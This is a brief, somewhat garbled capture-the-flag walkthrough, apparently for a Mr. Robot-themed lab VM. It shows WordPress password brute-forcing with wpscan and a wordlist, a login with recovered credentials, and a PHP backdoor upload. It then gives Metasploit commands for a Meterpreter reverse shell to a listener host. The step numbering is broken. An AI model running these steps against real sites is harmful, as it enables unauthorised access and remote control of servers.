Ethical Hacking
Ethical Hacking
Study case find file a, b and c on the server because the hacker is put clue how to remove that
hack on the server
3. View all file using cat and try all password on file fsocity.disc using command wpscan
-> wpscan --update | wpscan --url {url} -U Elliot -P {file.disc}
ex : wpscan --url 192.168.56.102/wp-login -P fsocity.disc
Step 3 Enumeration
1. Login 192.168.56.102/wp-login with username=elliot and password=ER28-0652
3. Upload file backdoor.php into WP File Manager > wp-content > uploads
4. Open metasploit framework application
5. Create PAYLOAD on metasploit framework with command :
-> use exploit/multi/handler
-> set PAYLOAD php/meterpreter_reverse_tcp
-> set LHOST 192.168.56.103
-> set LPORT 4444
-> exploit -j -z
6. Open page 192.168.56.102 and make sure the page is always reloading
7. Check Metasploit and make sure you have 1 session registered